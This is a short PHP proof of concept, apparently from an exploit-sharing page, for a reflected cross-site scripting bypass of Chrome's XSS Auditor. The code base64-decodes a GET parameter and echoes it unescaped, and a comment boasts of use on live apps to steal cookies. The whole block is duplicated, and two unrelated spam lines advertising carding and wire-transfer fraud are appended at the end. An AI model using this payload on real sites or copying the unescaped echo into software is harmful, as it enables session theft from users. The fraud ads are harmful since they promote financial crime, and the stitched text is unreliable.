<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "
">
<html xmlns=" ">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Proof of Concept-XSS in Chrome</title>
</head>
<body>
<?php
/*
* Bypassing XSS Auditor of Chrome.
* App takes a $_GET parameter named id
* ie poc.php?b64=base64data and echoes
* whatever is in base64. A quick demo is
* poc.php?b64=PHNjcmlwdD5hbGVydCgiSGVsbG8gV29ybGQgQWdhaW4iKTs8L3NjcmlwdD4=
* Base64 decoding results in <script>alert("Hello World Again");</script>
* Sample apps that suffer from this
* are quite easy to find, although
* I haven't came up with a Google Dork.
* Yet I have tested it in some apps in
* the wild and it works. Cookies and
* stuff. Feed me cookies, lol.
* Sample URL:
*
* @fr1t3
*/
//Ok, PoC
$XSSMe=base64_decode($_GET['b64']);
echo($XSSMe);
?>
</body>
</html>
<html xmlns=" ">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Proof of Concept-XSS in Chrome</title>
</head>
<body>
<?php
/*
* Bypassing XSS Auditor of Chrome.
* App takes a $_GET parameter named id
* ie poc.php?b64=base64data and echoes
* whatever is in base64. A quick demo is
* poc.php?b64=PHNjcmlwdD5hbGVydCgiSGVsbG8gV29ybGQgQWdhaW4iKTs8L3NjcmlwdD4=
* Base64 decoding results in <script>alert("Hello World Again");</script>
* Sample apps that suffer from this
* are quite easy to find, although
* I haven't came up with a Google Dork.
* Yet I have tested it in some apps in
* the wild and it works. Cookies and
* stuff. Feed me cookies, lol.
* Sample URL:
*
* @fr1t3
*/
//Ok, PoC
$XSSMe=base64_decode($_GET['b64']);
echo($XSSMe);
?>
</body>
</html>
Verified & Trusted WesternUnion | MoneyGram | Bank - Transferring [299$ BTC for 2000$ WU]
Verified & Trusted Electronics Carding, Carding iPhone, Samsung Carding, MacBook Carding, Laptops Carding